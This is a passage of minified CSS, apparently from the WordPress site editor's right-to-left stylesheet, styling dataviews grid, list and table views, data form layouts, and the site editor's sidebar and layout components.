var(--wp-admin-theme-color); } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__media:focus:after{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .dataviews-view-grid .dataviews-view-grid__media{ aspect-ratio:1/1; background-color:#fff; border-radius:4px; overflow:hidden; position:relative; width:100%; } .dataviews-view-grid .dataviews-view-grid__media img{ height:100%; object-fit:cover; width:100%; } .dataviews-view-grid .dataviews-view-grid__media:after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; pointer-events:none; position:absolute; right:0; top:0; width:100%; } .dataviews-view-grid .dataviews-view-grid__fields{ font-size:12px; line-height:16px; position:relative; } .dataviews-view-grid .dataviews-view-grid__fields:not(:empty){ padding:0 0 12px; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field-value:not(:empty){ line-height:20px; min-height:24px; padding-top:2px; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field{ align-items:center; min-height:24px; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-name{ color:#757575; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:35%; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-value{ overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:65%; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field:not(:has(.dataviews-view-grid__field-value:not(:empty))){ display:none; } .dataviews-view-grid .dataviews-view-grid__badge-fields:not(:empty){ padding-bottom:12px; } .dataviews-view-grid__field-value:empty,.dataviews-view-grid__field:empty{ display:none; } .dataviews-view-grid__card .dataviews-selection-checkbox{ opacity:0; position:absolute; right:8px; top:-9999em; z-index:1; } @media not (prefers-reduced-motion){ .dataviews-view-grid__card .dataviews-selection-checkbox{ transition:opacity .1s linear; } } @media (hover:none){ .dataviews-view-grid__card .dataviews-selection-checkbox{ opacity:1; top:8px; } } .dataviews-view-grid__card.is-selected .dataviews-selection-checkbox,.dataviews-view-grid__card:focus-within .dataviews-selection-checkbox,.dataviews-view-grid__card:hover .dataviews-selection-checkbox{ opacity:1; top:8px; } .dataviews-view-grid__card .dataviews-view-grid__media-actions{ left:4px; opacity:0; position:absolute; top:4px; } .dataviews-view-grid__card .dataviews-view-grid__media-actions .dataviews-all-actions-button{ background-color:#fff; } @media not (prefers-reduced-motion){ .dataviews-view-grid__card .dataviews-view-grid__media-actions{ transition:opacity .1s linear; } } @media (hover:none){ .dataviews-view-grid__card .dataviews-view-grid__media-actions{ opacity:1; top:4px; } } .dataviews-view-grid__card .dataviews-view-grid__media-actions:has(.dataviews-all-actions-button[aria-expanded=true]),.dataviews-view-grid__card:focus-within .dataviews-view-grid__media-actions,.dataviews-view-grid__card:hover .dataviews-view-grid__media-actions{ opacity:1; } .dataviews-view-grid__media--clickable{ cursor:pointer; } .dataviews-view-grid__group-header{ color:#1e1e1e; container-type:inline-size; font-size:15px; font-weight:500; margin:0 0 8px; padding:0 48px; } @container (max-width: 430px){ .dataviews-view-grid__group-header{ padding-left:24px; padding-right:24px; } } div.dataviews-view-list{ list-style-type:none; } .dataviews-view-list{ margin:0 0 auto; } .dataviews-view-list div[role=article],.dataviews-view-list div[role=row]{ border-top:1px solid #f0f0f0; margin:0; } .dataviews-view-list div[role=article] .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row] .dataviews-view-list__item-wrapper{ box-sizing:border-box; padding:16px 24px; position:relative; } .dataviews-view-list div[role=article] .dataviews-view-list__item-actions,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions{ display:flex; flex:0 0 auto; gap:4px; white-space:nowrap; width:max-content; } .dataviews-view-list div[role=article] .dataviews-view-list__item-actions .components-button,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions .components-button{ position:relative; z-index:1; } .dataviews-view-list div[role=article] .dataviews-view-list__item-actions>div,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>div{ height:24px; } .dataviews-view-list div[role=article] .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>:not(:last-child){ flex:0; overflow:hidden; width:0; } .dataviews-view-list div[role=article]:where(.is-selected,.is-hovered,:focus-within) .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row]:where(.is-selected,.is-hovered,:focus-within) .dataviews-view-list__item-actions>:not(:last-child){ flex-basis:min-content; overflow:unset; width:auto; } @media (hover:none){ .dataviews-view-list div[role=article] .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>:not(:last-child){ flex-basis:min-content; overflow:unset; width:auto; } } .dataviews-view-list div[role=article].is-selected.is-selected,.dataviews-view-list div[role=article].is-selected.is-selected+div[role=article],.dataviews-view-list div[role=article].is-selected.is-selected+div[role=row],.dataviews-view-list div[role=row].is-selected.is-selected,.dataviews-view-list div[role=row].is-selected.is-selected+div[role=article],.dataviews-view-list div[role=row].is-selected.is-selected+div[role=row]{ border-top:1px solid rgba(var(--wp-admin-theme-color--rgb), .12); } .dataviews-view-list div[role=article]:not(.is-selected) .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected) .dataviews-view-list__title-field{ color:#1e1e1e; } .dataviews-view-list div[role=article]:not(.is-selected).is-hovered,.dataviews-view-list div[role=article]:not(.is-selected):focus-within,.dataviews-view-list div[role=article]:not(.is-selected):hover,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered,.dataviews-view-list div[role=row]:not(.is-selected):focus-within,.dataviews-view-list div[role=row]:not(.is-selected):hover{ background-color:#f8f8f8; color:var(--wp-admin-theme-color); } .dataviews-view-list div[role=article]:not(.is-selected).is-hovered .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected).is-hovered .dataviews-view-list__title-field,.dataviews-view-list div[role=article]:not(.is-selected):focus-within .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected):focus-within .dataviews-view-list__title-field,.dataviews-view-list div[role=article]:not(.is-selected):hover .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected):hover .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected):focus-within .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected):focus-within .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected):hover .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected):hover .dataviews-view-list__title-field{ color:var(--wp-admin-theme-color); } .dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper{ background-color:rgba(var(--wp-admin-theme-color--rgb), .04); color:#1e1e1e; } .dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__title-field{ color:var(--wp-admin-theme-color); } .dataviews-view-list .dataviews-view-list__item{ appearance:none; background:none; border:none; cursor:pointer; inset:0; padding:0; position:absolute; scroll-margin:8px 0; z-index:1; } .dataviews-view-list .dataviews-view-list__item:focus-visible{ outline:none; } .dataviews-view-list .dataviews-view-list__item:focus-visible:before{ border-radius:2px; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); content:""; inset:var(--wp-admin-border-width-focus); outline:2px solid #0000; position:absolute; } .dataviews-view-list .dataviews-view-list__title-field{ flex:1; line-height:24px; min-height:24px; overflow:hidden; } .dataviews-view-list .dataviews-view-list__title-field:has(a,button){ z-index:1; } .dataviews-view-list .dataviews-view-list__media-wrapper{ background-color:#fff; border-radius:4px; flex-shrink:0; height:52px; overflow:hidden; position:relative; width:52px; } .dataviews-view-list .dataviews-view-list__media-wrapper img{ height:100%; object-fit:cover; width:100%; } .dataviews-view-list .dataviews-view-list__media-wrapper:after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; position:absolute; right:0; top:0; width:100%; } .dataviews-view-list .dataviews-view-list__field-wrapper{ flex-grow:1; min-height:52px; } .dataviews-view-list .dataviews-view-list__fields{ color:#757575; display:flex; flex-wrap:wrap; font-size:12px; gap:12px; row-gap:4px; } .dataviews-view-list .dataviews-view-list__fields .dataviews-view-list__field:has(.dataviews-view-list__field-value:empty),.dataviews-view-list .dataviews-view-list__fields:empty{ display:none; } .dataviews-view-list .dataviews-view-list__fields .dataviews-view-list__field-value{ align-items:center; display:flex; line-height:20px; min-height:24px; } .dataviews-view-list+.dataviews-pagination{ justify-content:space-between; } .dataviews-view-list__group-header{ color:#1e1e1e; font-size:15px; font-weight:500; margin:0 0 8px; padding:0 24px; } .dataviews-view-table{ border-collapse:collapse; border-color:inherit; color:#757575; margin-bottom:auto; position:relative; text-indent:0; width:100%; } .dataviews-view-table th{ color:#1e1e1e; font-size:13px; font-weight:400; text-align:right; } .dataviews-view-table td,.dataviews-view-table th{ padding:12px; } .dataviews-view-table td.dataviews-view-table__actions-column,.dataviews-view-table th.dataviews-view-table__actions-column{ text-align:left; } .dataviews-view-table td.dataviews-view-table__actions-column--sticky,.dataviews-view-table th.dataviews-view-table__actions-column--sticky{ background-color:#fff; left:0; position:sticky; } .dataviews-view-table td.dataviews-view-table__actions-column--stuck:after,.dataviews-view-table th.dataviews-view-table__actions-column--stuck:after{ background-color:#f0f0f0; bottom:0; content:""; display:block; position:absolute; right:0; top:0; width:1px; } .dataviews-view-table td.dataviews-view-table__checkbox-column,.dataviews-view-table th.dataviews-view-table__checkbox-column{ padding-left:0; } .dataviews-view-table td.dataviews-view-table__checkbox-column .dataviews-view-table__cell-content-wrapper,.dataviews-view-table th.dataviews-view-table__checkbox-column .dataviews-view-table__cell-content-wrapper{ max-width:auto; min-width:auto; } .dataviews-view-table tr{ border-top:1px solid #f0f0f0; } .dataviews-view-table tr .dataviews-view-table-header-button{ gap:4px; } .dataviews-view-table tr td:first-child,.dataviews-view-table tr th:first-child{ padding-right:48px; } .dataviews-view-table tr td:first-child .dataviews-view-table-header-button,.dataviews-view-table tr th:first-child .dataviews-view-table-header-button{ margin-right:-8px; } .dataviews-view-table tr td:last-child,.dataviews-view-table tr th:last-child{ padding-left:48px; } .dataviews-view-table tr:last-child{ border-bottom:0; } .dataviews-view-table tr.is-hovered,.dataviews-view-table tr.is-hovered .dataviews-view-table__actions-column--sticky{ background-color:#f8f8f8; } .dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input{ opacity:0; } .dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:checked,.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:focus,.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:indeterminate{ opacity:1; } .dataviews-view-table tr .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){ opacity:0; } .dataviews-view-table tr.is-hovered .components-checkbox-control__input,.dataviews-view-table tr.is-hovered .dataviews-item-actions .components-button:not(.dataviews-all-actions-button),.dataviews-view-table tr:focus-within .components-checkbox-control__input,.dataviews-view-table tr:focus-within .dataviews-item-actions .components-button:not(.dataviews-all-actions-button),.dataviews-view-table tr:hover .components-checkbox-control__input,.dataviews-view-table tr:hover .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){ opacity:1; } @media (hover:none){ .dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input,.dataviews-view-table tr .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){ opacity:1; } } .dataviews-view-table tr.is-selected{ background-color:rgba(var(--wp-admin-theme-color--rgb), .04); color:#757575; } .dataviews-view-table tr.is-selected,.dataviews-view-table tr.is-selected+tr{ border-top:1px solid rgba(var(--wp-admin-theme-color--rgb), .12); } .dataviews-view-table tr.is-selected:hover{ background-color:rgba(var(--wp-admin-theme-color--rgb), .08); } .dataviews-view-table tr.is-selected .dataviews-view-table__actions-column--sticky{ background-color:color-mix(in srgb, rgb(var(--wp-admin-theme-color--rgb)) 4%, #fff); } .dataviews-view-table tr.is-selected:hover .dataviews-view-table__actions-column--sticky{ background-color:color-mix(in srgb, rgb(var(--wp-admin-theme-color--rgb)) 8%, #fff); } .dataviews-view-table thead{ inset-block-start:0; position:sticky; z-index:1; } .dataviews-view-table thead tr{ border:0; } .dataviews-view-table thead tr .components-checkbox-control__input.components-checkbox-control__input{ opacity:1; } .dataviews-view-table thead th{ background-color:#fff; font-size:11px; font-weight:500; padding-bottom:8px; padding-right:12px; padding-top:8px; text-transform:uppercase; } .dataviews-view-table thead th:has(.dataviews-view-table-header-button):not(:first-child){ padding-right:4px; } .dataviews-view-table tbody td{ vertical-align:top; } .dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper{ align-items:center; display:flex; min-height:32px; white-space:nowrap; } .dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper.dataviews-view-table__cell-align-end{ justify-content:flex-end; } .dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper.dataviews-view-table__cell-align-center{ justify-content:center; } .dataviews-view-table tbody .components-v-stack>.dataviews-view-table__cell-content-wrapper:not(:first-child){ min-height:0; } .dataviews-view-table .dataviews-view-table-header-button{ font-size:11px; font-weight:500; padding:4px 8px; text-transform:uppercase; } .dataviews-view-table .dataviews-view-table-header-button:not(:hover){ color:#1e1e1e; } .dataviews-view-table .dataviews-view-table-header-button span{ speak:none; } .dataviews-view-table .dataviews-view-table-header-button span:empty{ display:none; } .dataviews-view-table .dataviews-view-table-header{ padding-right:4px; } .dataviews-view-table .dataviews-view-table__actions-column{ white-space:nowrap; width:auto; } .dataviews-view-table:has(tr.is-selected) .components-checkbox-control__input{ opacity:1; } .dataviews-view-table.has-compact-density thead th:has(.dataviews-view-table-header-button):not(:first-child){ padding-right:0; } .dataviews-view-table.has-compact-density td,.dataviews-view-table.has-compact-density th{ padding:4px 8px; } .dataviews-view-table.has-comfortable-density td,.dataviews-view-table.has-comfortable-density th{ padding:16px 12px; } .dataviews-view-table.has-comfortable-density td.dataviews-view-table__checkbox-column,.dataviews-view-table.has-comfortable-density th.dataviews-view-table__checkbox-column,.dataviews-view-table.has-compact-density td.dataviews-view-table__checkbox-column,.dataviews-view-table.has-compact-density th.dataviews-view-table__checkbox-column{ padding-left:0; } @container (max-width: 430px){ .dataviews-view-table tr td:first-child,.dataviews-view-table tr th:first-child{ padding-right:24px; } .dataviews-view-table tr td:last-child,.dataviews-view-table tr th:last-child{ padding-left:24px; } } .dataviews-view-table-selection-checkbox{ --checkbox-input-size:24px; } @media (min-width:600px){ .dataviews-view-table-selection-checkbox{ --checkbox-input-size:16px; } } .dataviews-column-primary__media{ background-color:#fff; border-radius:4px; flex-shrink:0; max-width:60px; overflow:hidden; position:relative; } .dataviews-column-primary__media img{ height:100%; object-fit:cover; width:100%; } .dataviews-column-primary__media:after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; position:absolute; right:0; top:0; width:100%; } .dataviews-view-table__cell-content-wrapper:not(.dataviews-column-primary__media),.dataviews-view-table__primary-column-content:not(.dataviews-column-primary__media){ max-width:80ch; min-width:15ch; } .dataviews-view-table__group-header-row .dataviews-view-table__group-header-cell{ color:#1e1e1e; font-weight:500; padding:12px 48px; } .dataviews-view-table col[class^=dataviews-view-table__col-]:not(.dataviews-view-table__col-primary){ width:1%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card{ height:100%; justify-content:flex-start; position:relative; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-actions{ padding:8px 0 4px; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-field{ align-content:center; min-height:24px; overflow:hidden; text-align:start; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-field--clickable{ width:fit-content; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-value{ color:#1e1e1e; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__media:focus:after,.dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__media:after{ background-color:rgba(var(--wp-admin-theme-color--rgb), .08); } .dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__media:after{ box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color); } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__media:focus:after{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .dataviews-view-picker-grid:focus-visible[aria-activedescendant]{ outline:none; } .dataviews-view-picker-grid:focus-visible [data-active-item=true]{ outline:2px solid var(--wp-admin-theme-color); } .dataviews-view-picker-grid .dataviews-selection-checkbox{ top:8px !important; } .dataviews-view-picker-grid .dataviews-selection-checkbox input{ pointer-events:none; } .dataviews-view-picker-grid .dataviews-view-picker-grid__media{ aspect-ratio:1/1; background-color:#fff; border-radius:4px; position:relative; width:100%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__media img{ height:100%; object-fit:cover; width:100%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__media:after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; pointer-events:none; position:absolute; right:0; top:0; width:100%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields{ font-size:12px; line-height:16px; position:relative; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields:not(:empty){ padding:0 0 12px; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field-value:not(:empty){ line-height:20px; min-height:24px; padding-top:2px; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field{ align-items:center; min-height:24px; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-name{ color:#757575; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:35%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-value{ overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:65%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field:not(:has(.dataviews-view-picker-grid__field-value:not(:empty))){ display:none; } .dataviews-view-picker-grid .dataviews-view-picker-grid__badge-fields:not(:empty){ padding-bottom:12px; } .dataviews-view-picker-grid__field-value:empty,.dataviews-view-picker-grid__field:empty{ display:none; } .dataviews-view-picker-grid__card .dataviews-selection-checkbox{ position:absolute; right:8px; top:-9999em; z-index:1; } @media (hover:none){ .dataviews-view-picker-grid__card .dataviews-selection-checkbox{ top:8px; } } .dataviews-view-picker-grid__card.is-selected .dataviews-selection-checkbox,.dataviews-view-picker-grid__card:focus-within .dataviews-selection-checkbox,.dataviews-view-picker-grid__card:hover .dataviews-selection-checkbox{ top:8px; } .dataviews-view-picker-grid__media--clickable{ cursor:pointer; } .dataviews-view-picker-grid-group__header{ color:#1e1e1e; font-size:15px; font-weight:500; margin:0 0 8px; padding:0 48px; } .dataviews-controls__datetime{ border:none; padding:0; } .dataviews-controls__relative-date-number,.dataviews-controls__relative-date-unit{ flex:1 1 50%; } .dataviews-controls__date input[type=date]::-webkit-calendar-picker-indicator,.dataviews-controls__date input[type=date]::-webkit-inner-spin-button{ -webkit-appearance:none; display:none; } .dataviews-controls__date-preset{ border:1px solid #ddd; } .dataviews-controls__date-preset:active{ background-color:#000; } .dataforms-layouts-panel__field{ align-items:flex-start !important; justify-content:flex-start !important; min-height:32px; width:100%; } .dataforms-layouts-panel__field-label{ align-items:center; display:flex; flex-shrink:0; hyphens:auto; line-height:20px; min-height:32px; width:38%; } .dataforms-layouts-panel__field-label--label-position-side{ align-self:center; } .dataforms-layouts-panel__field-control{ align-items:center; display:flex; flex-grow:1; min-height:32px; } .dataforms-layouts-panel__field-control .components-button{ max-width:100%; min-height:32px; text-align:right; text-wrap:balance; text-wrap:pretty; white-space:normal; } .dataforms-layouts-panel__field-control.components-button.is-link[aria-disabled=true]{ text-decoration:none; } .dataforms-layouts-panel__field-control .components-dropdown{ max-width:100%; } .dataforms-layouts-panel__field-dropdown .components-popover__content{ min-width:320px; padding:16px; } .dataforms-layouts-panel__dropdown-header{ margin-bottom:16px; } .dataforms-layouts-panel__modal-footer{ margin-top:16px; } .components-popover.components-dropdown__content.dataforms-layouts-panel__field-dropdown{ z-index:159990; } .dataforms-layouts-regular__field{ align-items:flex-start !important; justify-content:flex-start !important; min-height:32px; width:100%; } .dataforms-layouts-regular__field-label{ align-items:center; display:flex; flex-shrink:0; hyphens:auto; line-height:20px; min-height:32px; width:38%; } .dataforms-layouts-regular__field-label--label-position-side{ align-self:center; } .dataforms-layouts-regular__field-control{ align-items:center; display:flex; flex-grow:1; min-height:32px; } .dataforms-layouts-card__field-header-label{ font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:15px; font-weight:500; line-height:20px; } .dataforms-layouts-card__field{ width:100%; } .dataforms-layouts-card__field-description{ color:#757575; display:block; font-size:13px; margin-bottom:16px; } .dataforms-layouts-card__field-summary{ display:flex; flex-direction:row; gap:16px; } .dataforms-layouts-row__field-control{ width:100%; } .dataforms-layouts__wrapper{ font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; line-height:20px; } .edit-site-layout{ color:#ccc; display:flex; flex-direction:column; height:100%; } .edit-site-layout,.edit-site-layout:not(.is-full-canvas) .editor-visual-editor{ background:#1e1e1e; } .edit-site-layout__content{ display:flex; flex-grow:1; height:100%; } .edit-site-layout__sidebar-region{ flex-shrink:0; width:100vw; z-index:1; } @media (min-width:782px){ .edit-site-layout__sidebar-region{ width:300px; } } .edit-site-layout.is-full-canvas .edit-site-layout__sidebar-region{ height:100vh; position:fixed !important; right:0; top:0; } .edit-site-layout__sidebar-region .edit-site-layout__sidebar{ display:flex; flex-direction:column; height:100%; } .edit-site-layout__sidebar-region .resizable-editor__drag-handle{ left:0; } .edit-site-layout__main{ display:flex; flex-direction:column; flex-grow:1; overflow:hidden; } .edit-site-layout__mobile{ display:flex; flex-direction:column; position:relative; width:100%; z-index:2; } .edit-site-layout__mobile .edit-site-sidebar__screen-wrapper{ padding:0; } .edit-site-layout__mobile .edit-site-sidebar-navigation-screen__main{ padding:0 12px; } .edit-site-layout__canvas-container{ flex-grow:1; overflow:visible; position:relative; z-index:2; } .edit-site-layout__canvas-container.is-resizing:after{ bottom:0; content:""; left:0; position:absolute; right:0; top:0; z-index:100; } .edit-site-layout__canvas{ align-items:center; bottom:0; display:flex; justify-content:center; position:absolute; right:0; top:0; width:100%; } .edit-site-layout__canvas.is-right-aligned{ justify-content:flex-end; } .edit-site-layout__canvas .edit-site-resizable-frame__inner{ color:#1e1e1e; } @media (min-width:782px){ .edit-site-layout__canvas{ bottom:16px; top:16px; width:calc(100% - 16px); } .edit-site-layout__canvas .edit-site-resizable-frame__inner-content{ box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003; overflow:hidden; } } @media (min-width:782px) and (not (prefers-reduced-motion)){ .edit-site-layout__canvas .edit-site-resizable-frame__inner-content{ transition:border-radius,box-shadow .4s; } } @media (min-width:782px){ .edit-site-layout:not(.is-full-canvas) .edit-site-layout__canvas .edit-site-resizable-frame__inner-content{ border-radius:8px; } .edit-site-layout__canvas .edit-site-resizable-frame__inner-content:hover{ box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005; } } .edit-site-layout.is-full-canvas .edit-site-layout__canvas{ bottom:0; top:0; width:100%; } .edit-site-layout__canvas .interface-interface-skeleton,.edit-site-layout__mobile .interface-interface-skeleton,.edit-site-template-pages-preview .interface-interface-skeleton{ min-height:100% !important; position:relative !important; } .edit-site-template-pages-preview{ height:100%; } html.canvas-mode-edit-transition::view-transition-group(toggle){ animation-delay:255ms; } @media (prefers-reduced-motion){ ::view-transition-group(*),::view-transition-new(*),::view-transition-old(*){ animation:none !important; } } .edit-site-layout.is-full-canvas .edit-site-layout__sidebar-region .edit-site-layout__view-mode-toggle{ display:none; } .edit-site-layout__view-mode-toggle.components-button{ view-transition-name:toggle; align-items:center; background:#1e1e1e; border-radius:0; color:#fff; display:flex; height:64px; justify-content:center; overflow:hidden; padding:0; position:relative; width:64px; } .edit-site-layout__view-mode-toggle.components-button:active,.edit-site-layout__view-mode-toggle.components-button:hover{ color:#fff; } .edit-site-layout__view-mode-toggle.components-button:focus,.edit-site-layout__view-mode-toggle.components-button:focus-visible{ box-shadow:0 0 0 3px #1e1e1e, 0 0 0 6px var(--wp-admin-theme-color); outline:4px solid #0000; outline-offset:4px; } .edit-site-layout__view-mode-toggle.components-button:before{ border-radius:4px; bottom:9px; box-shadow:none; content:""; display:block; left:9px; position:absolute; right:17px; top:9px; } @media not (prefers-reduced-motion){ .edit-site-layout__view-mode-toggle.components-button:before{ transition:box-shadow .1s ease; } } .edit-site-layout__view-mode-toggle.components-button .edit-site-layout__view-mode-toggle-icon{ align-items:center; display:flex; height:64px; justify-content:center; width:64px; } .edit-site-layout__actions{ background:#fff; bottom:auto; color:#1e1e1e; left:0; position:fixed !important; right:auto; top:-9999em; width:280px; z-index:100000; } .edit-site-layout__actions:focus,.edit-site-layout__actions:focus-within{ bottom:0; top:auto; } .edit-site-layout__actions.is-entity-save-view-open:focus,.edit-site-layout__actions.is-entity-save-view-open:focus-within{ top:0; } @media (min-width:782px){ .edit-site-layout__actions{ border-right:1px solid #ddd; } } .edit-site-layout__area{ box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003; flex-grow:1; margin:0; overflow:hidden; } @media (min-width:782px){ .edit-site-layout__area{ border-radius:8px; margin:16px 0 16px 16px; } } .edit-site .components-editor-notices__snackbar{ bottom:16px; left:0; padding-left:16px; padding-right:16px; position:fixed; } .edit-site-save-hub{ border-top:1px solid #2f2f2f; color:#949494; flex-shrink:0; margin:0; padding:16px; } .edit-site-save-hub__button{ color:inherit; justify-content:center; width:100%; } .edit-site-save-hub__button[aria-disabled=true]{ opacity:1; } .edit-site-save-hub__button[aria-disabled=true]:hover{ color:inherit; } .edit-site-save-hub__button:not(.is-primary).is-busy,.edit-site-save-hub__button:not(.is-primary).is-busy[aria-disabled=true]:hover{ color:#1e1e1e; } @media (min-width:600px){ .edit-site-save-panel__modal{ width:600px; } } .edit-site-sidebar__content{ contain:content; flex-grow:1; overflow-x:hidden; overflow-y:auto; } @keyframes local--slide-from-right{ 0%{ opacity:0; transform:translateX(-50px); } to{ opacity:1; transform:none; } } @keyframes local--slide-from-left{ 0%{ opacity:0; transform:translateX(50px); } to{ opacity:1; transform:none; } } .edit-site-sidebar__screen-wrapper{ overflow-x:auto; } .edit-site-sidebar__screen-wrapper::-webkit-scrollbar{ height:12px; width:12px; } .edit-site-sidebar__screen-wrapper::-webkit-scrollbar-track{ background-color:initial; } .edit-site-sidebar__screen-wrapper::-webkit-scrollbar-thumb{ background-clip:padding-box; background-color:initial; border:3px solid #0000; border-radius:8px; } .edit-site-sidebar__screen-wrapper:focus-within::-webkit-scrollbar-thumb,.edit-site-sidebar__screen-wrapper:focus::-webkit-scrollbar-thumb,.edit-site-sidebar__screen-wrapper:hover::-webkit-scrollbar-thumb{ background-color:#757575; } .edit-site-sidebar__screen-wrapper{ scrollbar-color:#0000 #0000; scrollbar-gutter:stable both-edges; scrollbar-width:thin; } .edit-site-sidebar__screen-wrapper:focus,.edit-site-sidebar__screen-wrapper:focus-within,.edit-site-sidebar__screen-wrapper:hover{ scrollbar-color:#757575 #0000; } .edit-site-sidebar__screen-wrapper{ will-change:transform; } @media (hover:none){ .edit-site-sidebar__screen-wrapper{ scrollbar-color:#757575 #0000; } } .edit-site-sidebar__screen-wrapper{ animation-duration:.14s; animation-timing-function:ease-in-out; display:flex; flex-direction:column; height:100%; max-height:100%; padding:0 12px; scrollbar-gutter:stable; will-change:transform, opacity; } @media (prefers-reduced-motion:reduce){ .edit-site-sidebar__screen-wrapper{ animation-duration:0s; } } .edit-site-sidebar__screen-wrapper.slide-from-left{ animation-name:local--slide-from-left; } .edit-site-sidebar__screen-wrapper.slide-from-right{ animation-name:local--slide-from-right; } .edit-site-site-hub{ align-items:center; display:flex; gap:8px; height:64px; justify-content:space-between; margin-left:12px; } .edit-site-site-hub__actions{ flex-shrink:0; } 